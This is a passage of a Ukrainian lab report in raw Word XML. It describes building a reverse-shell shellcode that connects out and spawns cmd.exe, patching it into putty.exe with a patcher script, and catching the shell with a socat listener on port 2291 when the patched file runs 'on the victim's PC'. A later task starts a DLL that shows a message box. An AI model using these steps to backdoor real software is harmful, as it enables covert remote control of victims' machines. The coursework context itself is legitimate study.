        <w:t>socat</w:t>
      </w:r>
      <w:r w:rsidRPr="00845F87">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00845F87">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TCP</w:t>
      </w:r>
      <w:r w:rsidRPr="00845F87">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve">4:192.168.1.64:2291 </w:t>
      </w:r>
      <w:r w:rsidRPr="00845F87">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>STDIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB6D95C" w14:textId="609B44DB" w:rsidR="009A5382" w:rsidRDefault="009A5382" w:rsidP="004B3A7A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FAD695D" wp14:editId="154AACDB">
            <wp:extent cx="6645910" cy="2365375"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2133370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00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232F" w14:textId="77777777" w:rsidR="00191A4B" w:rsidRDefault="00191A4B" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0C6598" w14:textId="77777777" w:rsidR="00191A4B" w:rsidRDefault="00191A4B" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675CF41E" w14:textId="77777777" w:rsidR="00191A4B" w:rsidRDefault="00191A4B" w:rsidP="004B3A7A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7473869C" w14:textId="79CB2369" w:rsidR="00C845CC" w:rsidRDefault="0080701F" w:rsidP="007C7908">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="0080701F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00A24565">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Ш</w:t>
      </w:r>
      <w:r w:rsidR="00866827" w:rsidRPr="00866827">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>елл з оберненим з’єднанням (reverse shell)</w:t>
      </w:r>
      <w:r w:rsidR="00042DC2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8A2D8E" w14:textId="011E478D" w:rsidR="00EE04DE" w:rsidRPr="00784B64" w:rsidRDefault="00EE04DE" w:rsidP="00EE04DE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Файл </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>task</w:t>
      </w:r>
      <w:r w:rsidR="009B37E5" w:rsidRPr="009B37E5">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="002339AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA014A">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA014A">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>asm</w:t>
      </w:r>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>містить шелкод, що виконує наступні дії:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63025AF4" w14:textId="77777777" w:rsidR="00EE04DE" w:rsidRPr="008E0C46" w:rsidRDefault="00EE04DE" w:rsidP="00EE04DE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Зна</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ходить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SetConsoleCP</w:t>
      </w:r>
      <w:r w:rsidRPr="003B2D81">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SetConsoleOutputCP</w:t>
      </w:r>
      <w:r w:rsidRPr="003B2D81">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C37116">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>CreateProcessA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Sleep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="005800CC">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>32.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F66B60" w14:textId="34997C6A" w:rsidR="00EE04DE" w:rsidRPr="008E0C46" w:rsidRDefault="000B2FA4" w:rsidP="00EE04DE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00EE04DE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EE04DE" w:rsidRPr="00165205">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Зна</w:t>
      </w:r>
      <w:r w:rsidR="00EE04DE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ходить </w:t>
      </w:r>
      <w:r w:rsidR="00B741D0" w:rsidRPr="00B741D0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>WSAStartup</w:t>
      </w:r>
      <w:r w:rsidR="00B741D0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B741D0" w:rsidRPr="00B741D0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>WSASocketW</w:t>
      </w:r>
      <w:r w:rsidR="00B741D0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E14EAF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E14EAF" w:rsidRPr="00E14EAF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>InetPtonA</w:t>
      </w:r>
      <w:r w:rsidR="00E14EAF">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B14557" w:rsidRPr="00B14557">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>htons</w:t>
      </w:r>
      <w:r w:rsidR="00B14557">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B14557" w:rsidRPr="00B14557">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>connect</w:t>
      </w:r>
      <w:r w:rsidR="007A2642">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007A2642" w:rsidRPr="007A2642">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>closesocket</w:t>
      </w:r>
      <w:r w:rsidR="000C36ED">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00EE04DE" w:rsidRPr="003B2D81">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EE04DE" w:rsidRPr="005259A7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>send</w:t>
      </w:r>
      <w:r w:rsidR="00EE04DE">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidR="00EE04DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ws</w:t>
      </w:r>
      <w:r w:rsidR="00EE04DE" w:rsidRPr="00B47F67">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2_32.</w:t>
      </w:r>
      <w:r w:rsidR="00EE04DE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8232A4" w14:textId="2297F169" w:rsidR="00EE04DE" w:rsidRDefault="000B2FA4" w:rsidP="00EE04DE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00EE04DE" w:rsidRPr="00043621">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0068730C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Створює сокет та підключаєт</w:t>
      </w:r>
      <w:r w:rsidR="000A73F6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidR="0068730C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ся до сервера</w:t>
      </w:r>
      <w:r w:rsidR="009E16FA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08592423" w14:textId="20F9A5F1" w:rsidR="009E16FA" w:rsidRDefault="00FE6BB4" w:rsidP="009E16FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="009E16FA" w:rsidRPr="000B7473">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009E16FA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Змінює кодування на </w:t>
      </w:r>
      <w:r w:rsidR="009E16FA" w:rsidRPr="000B7473">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">UTF-8 </w:t>
      </w:r>
      <w:r w:rsidR="009E16FA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">та виконує </w:t>
      </w:r>
      <w:r w:rsidR="009E16FA" w:rsidRPr="000B7473">
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidR="009E16FA">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4F1A87" w14:textId="77777777" w:rsidR="004615F8" w:rsidRPr="00A91B24" w:rsidRDefault="004615F8" w:rsidP="009E16FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A65755" w14:textId="344F03DA" w:rsidR="009B37E5" w:rsidRPr="00BF5DE1" w:rsidRDefault="009B37E5" w:rsidP="009B37E5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Скомпілюємо шелкод </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tas</w:t>
      </w:r>
      <w:r w:rsidR="00B564A5">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidR="00A31CCA" w:rsidRPr="00A91B24">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="002339AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00F904AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="00D03AB2">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F904AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>asm</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE0628">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">та пропатчимо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>putty</w:t>
      </w:r>
      <w:r w:rsidRPr="00D03AB2">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F904AC">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>з</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">а допомогою </w:t>
      </w:r>
      <w:r w:rsidRPr="009B37E5">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>patcher</w:t>
      </w:r>
      <w:r w:rsidRPr="0057235B">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="009B37E5">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55711DAC" w14:textId="3DA46853" w:rsidR="009B37E5" w:rsidRPr="00BF5DE1" w:rsidRDefault="009B37E5" w:rsidP="009B37E5">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF5DE1">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="00420069" w:rsidRPr="00420069">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nasm -f bin task3_sc.asm -o task3_sc.obj &amp;&amp; python ../patcher.py --exe putty.exe --sc task3_sc.obj</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCD2237" w14:textId="1811C2CD" w:rsidR="009B37E5" w:rsidRDefault="00E810EE" w:rsidP="009E16F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6AE38C" wp14:editId="5A817036">
            <wp:extent cx="6645910" cy="3996690"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="24942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207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8B76" w14:textId="77777777" w:rsidR="00085EF2" w:rsidRPr="00DF7696" w:rsidRDefault="00085EF2" w:rsidP="00085EF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Отримаємо файл </w:t>
      </w:r>
      <w:r w:rsidRPr="00480730">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>patched.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6957FA31" w14:textId="77777777" w:rsidR="008E4CB9" w:rsidRDefault="008E4CB9" w:rsidP="00085EF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BEBA9C3" w14:textId="1C23AC2E" w:rsidR="00085EF2" w:rsidRDefault="004D02CA" w:rsidP="009E16FA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Відкриємо порт 2291 на хост ОС</w:t>
      </w:r>
      <w:r w:rsidR="00085EF2">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE54E69" w14:textId="5F65311A" w:rsidR="00700D66" w:rsidRPr="008F3898" w:rsidRDefault="00700D66" w:rsidP="009E16FA">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F3898">
        <w:rPr>
          <w:rStyle w:val="a7"/>
        </w:rPr>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:r w:rsidR="00820D7E" w:rsidRPr="008F3898">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>socat TCP4-LISTEN:2291 STDIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6915B1" w14:textId="583D7951" w:rsidR="003E250D" w:rsidRPr="00A77682" w:rsidRDefault="002436E9" w:rsidP="009E16FA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19A6AACB" wp14:editId="5FE0BF50">
            <wp:extent cx="6645910" cy="647065"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635"/>
            <wp:docPr id="139710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26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2F32" w14:textId="638CE1E8" w:rsidR="00AE70D6" w:rsidRPr="00A77682" w:rsidRDefault="007C79AC" w:rsidP="009E16FA">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Виконаємо </w:t>
      </w:r>
      <w:r w:rsidRPr="00480730">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>patched.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> на ПК жертви</w:t>
      </w:r>
      <w:r w:rsidR="00A77682" w:rsidRPr="00A77682">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522B31CF" w14:textId="294BB3CD" w:rsidR="00AE70D6" w:rsidRPr="00A77682" w:rsidRDefault="00A77682" w:rsidP="009E16FA">
      <w:r>
        <w:t>А на хост ОС побачимо шел:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AD7535" w14:textId="58171346" w:rsidR="003E250D" w:rsidRDefault="003E250D" w:rsidP="009E16FA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="084B42B1" wp14:editId="0468D781">
            <wp:extent cx="6645910" cy="2015490"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="371175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753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D9A5" w14:textId="77777777" w:rsidR="00FF6A0D" w:rsidRDefault="00FF6A0D" w:rsidP="009E16FA"/>
    <w:p w14:paraId="73147750" w14:textId="77777777" w:rsidR="00FF6A0D" w:rsidRDefault="00FF6A0D" w:rsidP="009E16FA"/>
    <w:p w14:paraId="3B96C6C4" w14:textId="198978DB" w:rsidR="003F6B66" w:rsidRDefault="00525E8D" w:rsidP="00142688">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4) </w:t>
      </w:r>
      <w:r w:rsidR="006F189B">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Шелкод</w:t>
      </w:r>
      <w:r w:rsidR="003F6B66">
        <w:t>, що забезпечує виконання скриптiв або промiжного коду iнтерпретованих мов без створення додаткових файлiв, за варiантом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22542579" w14:textId="77777777" w:rsidR="003F6B66" w:rsidRDefault="003F6B66" w:rsidP="00122CAE">
      <w:r>
        <w:t>6. PE DLL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C654CA5" w14:textId="396DC5C1" w:rsidR="00E7019A" w:rsidRPr="003C1F1B" w:rsidRDefault="003C1F1B" w:rsidP="00122CAE">
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Файл </w:t>
      </w:r>
      <w:r w:rsidRPr="00036F22">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>dllmain</w:t>
      </w:r>
      <w:r w:rsidRPr="00036F22">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00036F22">
        <w:rPr>
          <w:rStyle w:val="a3"/>
        </w:rPr>
        <w:t>cpp</w:t>
      </w:r>
      <w:r w:rsidR="00E7019A">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> бібліотек</w:t>
      </w:r>
      <w:r w:rsidR="00B91064">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="00036F22" w:rsidRPr="00036F22">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00DD5464">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>яка відкриває</w:t>
      </w:r>
      <w:r w:rsidR="00845B81">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> вікно з текстом </w:t>
      </w:r>
      <w:r w:rsidR="00845B81" w:rsidRPr="00845B81">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00845B81">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r w:rsidR="00845B81" w:rsidRPr="00845B81">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> #4"</w:t>
      </w:r>
      <w:r w:rsidR="00FB6769">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397A145C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once</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6BD49B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pch.h"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C80738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windows.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC998B5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36F4156C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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="ru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APIENTRY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DllMain(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HMODUL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hModul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ul_reason_for_call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LPVOI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lpReserved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4CE69684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45292E54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ul_reason_for_call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57E32754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14:paraId="4068A10D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DLL_PROCESS_ATTACH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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F739E8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14:paraId="0F752604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MessageBoxA(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Task #4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TASK #4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MB_OK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1C402BCA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4DCB108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01807925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DLL_THREAD_ATTACH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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B42FDF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14:paraId="739D5706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762084C0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5891B874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DLL_THREAD_DETACH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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E19F9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14:paraId="5A174B82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AB8A333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2859C7BA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DLL_PROCESS_DETACH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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174FE923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14:paraId="6FAFB0E3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221F81D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2C384FEC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075ECCFB" w14:textId="77777777" w:rsidR="00BD57A9" w:rsidRDefault="00BD57A9" w:rsidP="00BD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743F5B08" w14:textId="5AEA6E28" w:rsidR="00820D7E" w:rsidRPr="00A91B24" w:rsidRDefault="00BD57A9" w:rsidP="00BD57A9">
      <w:pPr>
        <w:rPr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1461F134" w14:textId="656E7E5C" w:rsidR="007C7908" w:rsidRPr="00A91B24" w:rsidRDefault="00F73524" w:rsidP="007C7908">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Скомпілюємо і отримаємо </w:t>
      </w:r>
